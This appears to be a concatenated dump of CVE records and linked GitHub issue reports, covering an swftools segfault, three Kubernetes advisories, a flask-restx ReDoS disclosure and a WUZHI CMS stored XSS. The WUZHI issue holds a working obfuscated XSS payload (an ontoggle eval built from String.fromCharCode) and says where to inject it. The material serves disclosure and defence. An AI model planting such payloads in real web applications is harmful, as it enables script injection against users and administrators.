[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/145
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==9224==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x559475594d38 bp 0x000000000000 sp 0x7fffe52943c0 T0) #0 0x559475594d37 in callcode as3/code.c:754 #1 0x55947559dffe in code_get_stats as3/code.c:885 #2 0x55947559e8ef in code_dump2 as3/code.c:921 #3 0x5594755686bf in dump_method as3/abc.c:405 #4 0x559475573433 in swf_DumpABC as3/abc.c:722 #5 0x5594754e9038 in main /home/seviezhou/swftools/src/swfdump.c:1578 #6 0x7f5b9fce3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x5594754ec439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV as3/code.c:754 callcode ==9224==ABORTING ``` ## POC [SEGV-callcode-code-754.zip](https://github.com/matthiaskramm/swftools/files/5042016/SEGV-callcode-code-754.zip)
A Segmentation fault in code.c:754
https://api.github.com/repos/swftools/swftools/issues/145/comments
0
2020-08-07T14:40:34Z
2020-08-07T14:40:34Z
https://github.com/swftools/swftools/issues/145
675,061,211
145
2,595
CVE-2020-8561
2021-09-20T17:15:08.187
A security issue was discovered in Kubernetes where actors that control the responses of MutatingWebhookConfiguration or ValidatingWebhookConfiguration requests are able to redirect kube-apiserver requests to private networks of the apiserver. If that user can view kube-apiserver logs when the log level is set to 10, they can view the redirected responses and headers in the logs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/104720" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211014-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/104720" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211014-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.20.11:-:*:*:*:*:*:*", "matchCriteriaId": "1E602175-D34A-44F2-88CD-C0D2C5D240EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.21.5:-:*:*:*:*:*:*", "matchCriteriaId": "0CBB908A-7235-4F5A-AD59-9E11B77A4CA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.22.2:-:*:*:*:*:*:*", "matchCriteriaId": "8A1DF02D-B561-445F-8262-3A9F6762CBC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "610" ]
610
https://github.com/kubernetes/kubernetes/issues/104720
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in Kubernetes where actors that control the responses of MutatingWebhookConfiguration or ValidatingWebhookConfiguration requests are able to redirect kube-apiserver requests to private networks of the apiserver. If that user can view kube-apiserver logs when the log level is set to 10, they can view the redirected responses and headers in the logs. This issue has been rated **Medium** (https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N) (4.1), and assigned **CVE-2020-8561** ### Am I vulnerable? You may be vulnerable if `--profiling` is enabled on the kube-apiserver and actors who control a validating or mutating webhook can access the kube-apiserver process logs. #### Affected Versions This issue affects all known versions of kube-apiserver. ### How do I mitigate this vulnerability? This issue can be mitigated by not allowing kube-apiserver access to sensitive resources or networks, or to reduce the “-v” flag value to less than 10 and set the “--profiling” flag value to “false” (default value is “true”). Setting the profiling flag to “false” prevents users from dynamically modifying the kube-apiserver log level, and the flag value Webhook requests may still be redirected to private networks with a log level less than 10, but the response body will not be logged. ### Fixed Versions There is no fix for this issue at this time. ### Detection Examining kube-apiserver log responses is the only known method of detection for this issue. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by QiQi Xu /triage accepted /lifecycle frozen /area security /kind bug /committee security-response
CVE-2020-8561: Webhook redirect in kube-apiserver
https://api.github.com/repos/kubernetes/kubernetes/issues/104720/comments
17
2021-09-01T20:18:50Z
2024-10-30T15:47:32Z
https://github.com/kubernetes/kubernetes/issues/104720
985,625,732
104,720
2,596
CVE-2021-25740
2021-09-20T17:15:08.283
A security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/103675" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211014-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/103675" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211014-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C32308-314D-4E0D-B15F-6A68DF21E9F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "610" ]
610
https://github.com/kubernetes/kubernetes/issues/103675
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack. This issue has been rated **Low** severity ([CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)), and assigned **CVE-2021-25740**. ### Am I vulnerable? If a potential attacker can create or edit Endpoints or EndpointSlices in the Kubernetes API, they can potentially direct a LoadBalancer or Ingress implementation to expose backend IPs the attacker should not have access to. Importantly, if the target’s NetworkPolicy already trusts the Load Balancer or Ingress implementation, NetworkPolicy can not be used to prevent exposure from other namespaces, potentially bypassing any security controls such as LoadBalancerSourceRanges. This issue is a design flaw that cannot be fully mitigated without user-facing changes. With this public announcement, we can begin conversations about a long-term fix. #### Affected Versions All Kubernetes versions are affected. ### How do I mitigate this vulnerability? There is no patch for this issue, and it can currently only be mitigated by restricting access to the vulnerable features. To mitigate the exposure, we recommend restricting write access to Endpoints and EndpointSlices by updating the system:aggregate-to-edit role using the [attached file](https://github.com/kubernetes/kubernetes/files/6823580/aggregate_to_edit_no_endpoints.yaml.txt). This will remove write access to Endpoints from the admin and edit roles: ```shell # Allow kubectl auth reconcile to work kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=true # Test reconcile, then run for real if happy kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt --dry-run kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt # Prevent autoreconciliation back to old state kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=false ``` Note: This will prevent new versions of Kubernetes from reconciling new default permissions to this role. No new default permissions have been added to this role since v1.14.0, but we recommend you remove the autoupdate=false annotation as soon as a fix or other mitigation is possible. For use-cases that need to edit these resources, we recommend creating a new purpose-built Role with the desired permissions, and using it only for those cases. ### Detection Services with an empty selector rely on custom endpoints and are vulnerable to the attack described above. We recommend manually auditing any such usage. The following kubectl command will list all Services in a cluster with their selector: ``` kubectl get svc --all-namespaces -o=custom-columns='NAME:metadata.name,NAMESPACE:metadata.namespace,SELECTOR:spec.selector' ``` Note: Some Services without selectors specified may have their Endpoints managed by other controllers or tools. For example, endpoints for the default/kubernetes Service are managed by the Kubernetes API Server. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Additional Advisory A similar attack is possible using Ingress implementations that support forwarding to ExternalName Services. This can be used to forward to Services in other namespaces or, in some cases, sensitive endpoints within the Ingress implementation. If you are using the Ingress API, we recommend confirming that the implementation you’re using either does not support forwarding to ExternalName Services or supports disabling the functionality. #### Additional Details See the GitHub issue for more updates: https://github.com/kubernetes/kubernetes/issues/103675 Thank You, Rob Scott on behalf of Kubernetes SIG Network and CJ Cullen on behalf of the Kubernetes Product Security Committee
CVE-2021-25740: Endpoint & EndpointSlice permissions allow cross-Namespace forwarding
https://api.github.com/repos/kubernetes/kubernetes/issues/103675/comments
15
2021-07-14T03:30:07Z
2024-01-22T16:27:49Z
https://github.com/kubernetes/kubernetes/issues/103675
944,001,066
103,675
2,597
CVE-2021-25741
2021-09-20T17:15:08.343
A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/104980" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211008-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/104980" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Mitigation" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211008-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "294F8F39-19EC-48D3-8013-C35B7E3076B5", "versionEndExcluding": null, "versionEndIncluding": "1.19.14", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "816775F6-5488-47BB-8080-DF5D12D14C69", "versionEndExcluding": null, "versionEndIncluding": "1.20.10", "versionStartExcluding": null, "versionStartIncluding": "1.20.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A62C3A55-B83B-42E1-B6B1-E7395D2DB930", "versionEndExcluding": null, "versionEndIncluding": "1.21.4", "versionStartExcluding": null, "versionStartIncluding": "1.21.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "6683F913-E546-4C97-A5E7-09FB6FDB0D37", "versionEndExcluding": null, "versionEndIncluding": "1.22.1", "versionStartExcluding": null, "versionStartIncluding": "1.22.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/kubernetes/kubernetes/issues/104980
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. This issue has been rated **High** ([CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)), and assigned **CVE-2021-25741**. ### Affected Components and Configurations This bug affects kubelet. Environments where cluster administrators have restricted the ability to create hostPath mounts are the most seriously affected. Exploitation allows hostPath-like access without use of the hostPath feature, thus bypassing the restriction. In a default Kubernetes environment, exploitation could be used to obscure misuse of already-granted privileges. #### Affected Versions v1.22.0 - v1.22.1 v1.21.0 - v1.21.4 v1.20.0 - v1.20.10 <= v1.19.14 #### Fixed Versions This issue is fixed in the following versions: v1.22.2 v1.21.5 v1.20.11 v1.19.15 ### Mitigation To mitigate this vulnerability without upgrading kubelet, you can disable the VolumeSubpath feature gate on kubelet and kube-apiserver, and remove any existing Pods making use of the feature. You can also use admission control to prevent less-trusted users from running containers as root to reduce the impact of successful exploitation. ### Detection If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io ### Additional Details See Kubernetes Issue #104980 for more details. ### Acknowledgements This vulnerability was reported by Fabricio Voznika and Mark Wolters of Google. Thanks as well to Ian Coldwater, Duffie Cooley, Brad Geesaman, and Rory McCune for the thorough security research that led to the discovery of this vulnerability.
CVE-2021-25741: Symlink Exchange Can Allow Host Filesystem Access
https://api.github.com/repos/kubernetes/kubernetes/issues/104980/comments
16
2021-09-13T20:58:56Z
2022-06-01T20:25:36Z
https://github.com/kubernetes/kubernetes/issues/104980
995,325,596
104,980
2,598
CVE-2021-32838
2021-09-20T18:15:11.010
Flask-RESTX (pypi package flask-restx) is a community driven fork of Flask-RESTPlus. Flask-RESTX before version 0.5.1 is vulnerable to ReDoS (Regular Expression Denial of Service) in email_regex. This is fixed in version 0.5.1.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-3q6g-vf58-7m4g" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/blob/fd99fe11a88531f5f3441a278f7020589f9d2cc0/flask_restx/inputs.py#L51" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/commit/bab31e085f355dd73858fd3715f7ed71849656da" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/issues/372" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5UCTFVDU3677B5OBGK4EF5NMUPJLL6SQ/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUD6SWZLX52AAZUHDETJ2CDMQGEPGFL3/" }, { "source": "security-advisories@github.com", "tags": [ "Product", "Third Party Advisory" ], "url": "https://pypi.org/project/flask-restx/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-3q6g-vf58-7m4g" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/blob/fd99fe11a88531f5f3441a278f7020589f9d2cc0/flask_restx/inputs.py#L51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/commit/bab31e085f355dd73858fd3715f7ed71849656da" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/python-restx/flask-restx/issues/372" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5UCTFVDU3677B5OBGK4EF5NMUPJLL6SQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUD6SWZLX52AAZUHDETJ2CDMQGEPGFL3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://pypi.org/project/flask-restx/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flask-restx_project:flask-restx:*:*:*:*:*:python:*:*", "matchCriteriaId": "BA9C0D28-C95B-41C6-A116-511860EDE383", "versionEndExcluding": "0.5.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/python-restx/flask-restx/issues/372
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "python-restx", "flask-restx" ]
Hello, The [GitHub Security Lab team](https://securitylab.github.com/) has found a potential vulnerability in your project. Please create a [Security Advisory](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/creating-a-security-advisory) and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a [Security Policy](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/adding-a-security-policy-to-your-repository) containing a security email address to send the details to. If you prefer to contact us by email, please reach out to securitylab@github.com with reference to GHSL-2021-123. Thank you, Kevin Backhouse GitHub Security Lab
GHSL-2021-123
https://api.github.com/repos/python-restx/flask-restx/issues/372/comments
3
2021-08-31T17:26:29Z
2021-09-13T00:02:17Z
https://github.com/python-restx/flask-restx/issues/372
984,107,821
372
2,599
CVE-2020-19915
2021-09-20T19:15:07.663
Cross Site Scripting (XSS vulnerability exists in WUZHI CMS 4.1.0 via the mailbox username in index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/feixuezhi/7a1b117e1a4800efb3b6fffe76ca0e97" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/173" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/feixuezhi/7a1b117e1a4800efb3b6fffe76ca0e97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/173" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wuzhicms/wuzhicms/issues/173
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
A persistent XSS vulnerability was discovered in WUZHI CMS 4.1.0 There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML. POC "> <details/open /ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(50)+String.fromCharCode(41))> Vulnerability trigger point http://localhost/index.php?m=core&f=index&_su=wuzhicms. When attacker access -system settings - mail server - mail server - mailbox username, write poc content, then XSS vulnerability is triggered successfully. 1、choose this part and write poc to [mailbox username] ![叛逆个1](https://user-images.githubusercontent.com/13130156/54094700-c8f76280-43dd-11e9-80c1-ba827e2c0599.png) 2、submit and view webpage ![叛逆个2](https://user-images.githubusercontent.com/13130156/54094709-d14f9d80-43dd-11e9-8c96-5a35f1387aad.png)
wuzhicms v4.1.0 persistent xss vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/173/comments
0
2019-03-05T10:36:17Z
2019-07-31T08:37:33Z
https://github.com/wuzhicms/wuzhicms/issues/173
417,229,065
173
2,600
CVE-2020-19551
2021-09-21T19:15:07.297
Blacklist bypass issue exists in WUZHI CMS up to and including 4.1.0 in common.func.php, which when uploaded can cause remote code executiong.
